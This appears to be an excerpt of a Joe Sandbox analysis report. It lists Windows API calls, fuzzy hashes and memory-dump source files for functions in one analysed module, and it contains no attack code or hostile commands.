                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 3979206172-0
                                            • Opcode ID: 925070d645f3323595ff3ed55e8f60f776ec3d85424af0616b929743ff91a5ee
                                            • Instruction ID: 2a71a8bb2e951aaf3d6750956bea1a8c52d4890ae2ddfa87dac7ff8cb92994de
                                            • Opcode Fuzzy Hash: 925070d645f3323595ff3ed55e8f60f776ec3d85424af0616b929743ff91a5ee
                                            • Instruction Fuzzy Hash: 53311AB5A04209AFDB00DFA8C894B9EBBB8FF59314F108519F915D7350EB35D941CB60
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,689C11FD,000000FF,?,68958B80,00000000,?,00000000,?,68958C13,?,?), ref: 68957415
                                            • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,689C11FD,000000FF,?,68958B80,00000000,?,00000000,?,68958C13,?,?), ref: 6895741B
                                            • std::exception::exception.LIBCMT ref: 6895743D
                                            • __CxxThrowException@8.LIBCMT ref: 68957452
                                            • std::exception::exception.LIBCMT ref: 68957461
                                            • __CxxThrowException@8.LIBCMT ref: 68957476
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C04
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C1E
                                              • Part of subcall function 689A9BB5: __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
                                            • String ID:
                                            • API String ID: 189561132-0
                                            • Opcode ID: fad591044b9ac86664593b2646291ba98d6a0dc5bd83aec5143f0827f6122006
                                            • Instruction ID: fa5ed1c7483e4d61fb34002c52f0d4a178b992c22a0c1f00b958657d663d8362
                                            • Opcode Fuzzy Hash: fad591044b9ac86664593b2646291ba98d6a0dc5bd83aec5143f0827f6122006
                                            • Instruction Fuzzy Hash: 80313AB5900A449FC751CF69C880A9AFBF4FF59310B84855EE85697B40D771E504CF62
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 812e7abf21b23c8397429dcb43aff3d9638ecdc6d182b07449d237fd629154fb
                                            • Instruction ID: 035c1ee0c840cdd2f4698310fd427ab288c645b4ecbea4b1ac944fe18271035d
                                            • Opcode Fuzzy Hash: 812e7abf21b23c8397429dcb43aff3d9638ecdc6d182b07449d237fd629154fb
                                            • Instruction Fuzzy Hash: 24313A74E006289FDB11CBA8CD80B5EB7FEAF99214F60858AE429E7241C771ED81CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 178754ab2cd0c80fed458d0b67b162206aad27de57b1c639bce18ab9abf5ab51
                                            • Instruction ID: e4ed2f57b7d7257b3fce06e898fc9dd2f73afde05c964cea2bde4e15bdfd6835
                                            • Opcode Fuzzy Hash: 178754ab2cd0c80fed458d0b67b162206aad27de57b1c639bce18ab9abf5ab51
                                            • Instruction Fuzzy Hash: 50314CB0E006189FDB11DBA8CC84B5EB7FDAF99214F64858AE429E7241C775ED81CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: b5034342d0c43504fe0f70bf48fa47584139a1ade49808dfdbf2634b75750669
                                            • Instruction ID: edf2ef4af267fb280bd6bd878363923af5096af1d6754339dfb6938b421d877a
                                            • Opcode Fuzzy Hash: b5034342d0c43504fe0f70bf48fa47584139a1ade49808dfdbf2634b75750669
                                            • Instruction Fuzzy Hash: B8313A70E006189FEB11DB68CC84B6EB7FDAF89214F64859AE429E7245C775ED80CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 8deeb4a57ed568408d3b4e946b9941d8d8c131b671919835a0f58c5e05eaa689
                                            • Instruction ID: ffb2a49f9032d4a83cd6c60e8c9bd736d03327b6afa2d5a0c03dae84ed97bb08
                                            • Opcode Fuzzy Hash: 8deeb4a57ed568408d3b4e946b9941d8d8c131b671919835a0f58c5e05eaa689
                                            • Instruction Fuzzy Hash: 28313C70E006189FDB11CB68CC84B9EB7FDAF99214F60868AE529E7245D771ED80CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: e78500f0543e4b865b767c8140c70eea06185ebbed67bcc0f5d3fb3b0bfb908e
                                            • Instruction ID: 102e81bb9701e698e9ab528770650412b38532d5e89395bf1bff663088151d26
                                            • Opcode Fuzzy Hash: e78500f0543e4b865b767c8140c70eea06185ebbed67bcc0f5d3fb3b0bfb908e
                                            • Instruction Fuzzy Hash: 06312B70E006189FDB11DBA8CC84B5EB7FDAF89214FA0868AE429E7245C771E980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 24fa3b20458098fefddfc8a381fd6d7ac058deda890bc09ef89e8ff2ddfde635
                                            • Instruction ID: 1986abae79f9fd8657cdf2407d461ef079406d08f348c26b23653b4957f14cfa
                                            • Opcode Fuzzy Hash: 24fa3b20458098fefddfc8a381fd6d7ac058deda890bc09ef89e8ff2ddfde635
                                            • Instruction Fuzzy Hash: 5B311A70E006189FDB11DBA8CC84B6EB7FDAF85214F64859AE529E7241C771D980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 178754ab2cd0c80fed458d0b67b162206aad27de57b1c639bce18ab9abf5ab51
                                            • Instruction ID: b67df64a76de9890f165262d479e1da26fcf0bec6ed876ce859859a28d63a688
                                            • Opcode Fuzzy Hash: 178754ab2cd0c80fed458d0b67b162206aad27de57b1c639bce18ab9abf5ab51
                                            • Instruction Fuzzy Hash: EC313A70A006189FDB10DBA9CC80BADB7BDAF99714F60858AE428E7241CB71D981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: b5034342d0c43504fe0f70bf48fa47584139a1ade49808dfdbf2634b75750669
                                            • Instruction ID: 5fc4de01da8754322cb9350a9e72e9cf59090c1228c30d60d9ea108173cec57b
                                            • Opcode Fuzzy Hash: b5034342d0c43504fe0f70bf48fa47584139a1ade49808dfdbf2634b75750669
                                            • Instruction Fuzzy Hash: 91312B70A006189FDB10DBA9CC80B6DB7BEAF99614F64859AE418E7241C771D9818F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 8deeb4a57ed568408d3b4e946b9941d8d8c131b671919835a0f58c5e05eaa689
                                            • Instruction ID: 0e1c4a8a1915cadf1071f58600cd91b3f08311ba80a0c9cd24dd10a6c302394a
                                            • Opcode Fuzzy Hash: 8deeb4a57ed568408d3b4e946b9941d8d8c131b671919835a0f58c5e05eaa689
                                            • Instruction Fuzzy Hash: F7314D70A006189FDB10CBA9CC80B9DB7BDAF99714FA0868AE418E7245C771DD80CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: e78500f0543e4b865b767c8140c70eea06185ebbed67bcc0f5d3fb3b0bfb908e
                                            • Instruction ID: 78feebdbaeb3a0ccb9190f3e06cc20b644a5127cdfa1e06ac5db827bdc6f2ad6
                                            • Opcode Fuzzy Hash: e78500f0543e4b865b767c8140c70eea06185ebbed67bcc0f5d3fb3b0bfb908e
                                            • Instruction Fuzzy Hash: 17312D70A006189FDB10CFA9CC84B9DB7BDAF99614F60869AE418E7255D771D980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 97517094ea0465f067fc422106deab0fcc086e1763a0fb08c30ae253153d94c0
                                            • Instruction ID: 6eb6e9646c77f6ff9931634423e695aa7bb8380178f6afee271943ff6de7dcef
                                            • Opcode Fuzzy Hash: 97517094ea0465f067fc422106deab0fcc086e1763a0fb08c30ae253153d94c0
                                            • Instruction Fuzzy Hash: 1E313AB0E006189FDB10DBA9CC80BADB7BDAF99714F60858AE528E7241D771D9808F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
